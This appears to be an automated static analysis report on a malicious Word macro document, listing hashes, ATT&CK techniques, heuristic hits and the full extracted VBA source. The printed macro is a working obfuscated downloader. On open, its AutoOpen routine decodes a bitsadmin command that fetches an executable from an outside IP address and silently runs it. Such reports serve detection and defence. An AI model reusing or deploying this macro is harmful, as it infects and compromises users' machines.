Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 115c18d207694542…

MALICIOUS

Office (OLE)

117.0 KB Created: 2016-08-03 20:27:00 Authoring application: Microsoft Office Word First seen: 2016-10-06
MD5: 2e374756930bee59c371d98ff88572a8 SHA-1: c5f3fd7570bd32edc44795a92c59965b4d9bbc08 SHA-256: 115c18d207694542dad0e876a36f1a64447a45fa2f78a0254f75799122810922
168 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Word document containing VBA macros. It uses a common lure to trick users into enabling macros, which then execute the embedded VBA code. The VBA code contains a potential Shell call and CreateObject call, indicating it likely attempts to download and execute a second-stage payload.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell nUKaI61f, 0
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set SHswlL = CreateObject("vbscript.regexp")
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3927 bytes
SHA-256: 832ad71f3d8616cfee7e21a8a0f1f532fe7356c4a27eb0e09a0bcdeca72cc141
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function MJCTM(CWDMxZLy As String, FbIlx As String)
Const MiPNInTB = "usher"
Const VoTwTzi = 56413.774156729
ijrJGJ = 27499.72631798
Dim SMBLRBfVb
SMBLRBfVb = Empty
Dim UaeOs
UaeOs = Array()
Dim u6TmeUD
u6TmeUD = 104
ur6AH = Null
cxnTF = "l"
MJCTM = Replace(CWDMxZLy, FbIlx, "")
Dim pLTyDvz
pLTyDvz = Empty
pcIlatmCk = Array(230, -196, -2001184018, 42, True)
BnrkBExe = Array(10023, True, 53568, 247)
Dim WDYsMRc
WDYsMRc = 30721.11938915
Dim YzdUxwdTr As Integer
YzdUxwdTr = 6299
Dim lByiA
lByiA = Array()
Const zLddbe = "m"
Dim rIBoSu3Y
rIBoSu3Y = Null
Set SHswlL = CreateObject("vbscript.regexp")
QSdqj = Date
Const NFLd2 = 209
Dim twrPREK As Variant
twrPREK = Array()
Dim u5gdI As Variant
u5gdI = Array(False, "b1bc", 253, 17635, -1034035452)
Const AiUVN = 130
Dim xrO5u As Boolean
xrO5u = False
Dim DtSd2 As Currency
DtSd2 = 24643
TxB7XFd = Array()
SHswlL.Pattern = FbIlx
Dim KWqu4PuM
KWqu4PuM = Array(18941)
Const PoTWMJbw = 4611
Const zvcqMHRt = 45690
Dim dBM7m
dBM7m = Array()
Dim Jhkf0ces
Jhkf0ces = 18334
Px3LN = Empty
Dim CP3XeR As Long
Dim QLnSIFu
QLnSIFu = "g"
Dim FjRfK
FjRfK = 37054
Dim lttYOFV As Byte
lttYOFV = 103
Dim hwbE4nQC
hwbE4nQC = 238
Dim HxZaHEuKH
HxZaHEuKH = ""
ZIGd3quHC = Date
efuU1j3i = 19822
CP3XeR = True
IsvteRd = True
Dim xrm3j
xrm3j = 0
Const wwBlWqvE = 32055
Dim YrDaO As Integer
YrDaO = -20549
Dim TQAPu
TQAPu = Empty
XFRbqp6x = False
QvKu9pdc = Array(0, -324123460, True, "-51274", 201, 77, 0)
Const ZLaDNPOM0 = 0
SHswlL.Global = CP3XeR
Dim BShA9 As Long
BShA9 = -652703950
Dim VLlsY
VLlsY = 173
Dim JrF8V
JrF8V = Null
Const YCxJyqzq = -23691
PlVOxYFG = "-31815"
Const QjPYL = 224
MJCTM = SHswlL.Replace(CWDMxZLy, "")
End Function

Sub AutoOpen()
Dim GUEQgl0 As Currency
GUEQgl0 = -4067
Dim wcUbOm
wcUbOm = Array()
Dim gq5z4s
gq5z4s = Array(44415.093361908, -12425, True, "T", "08fd", True)
oUJ1RH = 12730.522629119
Dim SYLDEIEHU As Long
SYLDEIEHU = -1851000800
Dim FtubqlSwF
FtubqlSwF = 194
Const nfYJAbOe = True
dXqA7m = Array(-12581, "debasement", 5843.503110416, 51380, 28, 17137.457762019)
Dim nUKaI61f As String
Const EbPbjMfg = False
Dim ETBwFjm
ETBwFjm = Array()
qHfrpSwZq = -219635906
Dim uj0Cswp
uj0Cswp = 9
Dim kyyXvysya As Variant
kyyXvysya = Array()
nUKaI61f = MJCTM("cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9", "So4T9")
AJnLTjdoe = Array(50590, 0, 253, 11638, "ring", False, -2378)
Dim jQsbW
jQsbW = Date
Dim J8pAjy As String
J8pAjy = "317eed7b"
zHgWO = -2086329278
kpmVq = Empty
BqXpmPanR = True
hRpGYfaRr = -426398108
Const IbHFT = "32500"
G3h5PwT = -13855
Shell nUKaI61f, 0
Hwpuwedp = Array(0, 20128, 54868.962024103, 45712.308802002, True, -1868748710, "")
ORSXIMyL = -16892
Dim SGqXR
SGqXR = 16032.845284238
Const OFXiY = 34986.350534212
Dim xQWF3VrvY As Variant
xQWF3VrvY = Array()
dVrztZa = 0
JBwM8 = 14580.854766339
End Sub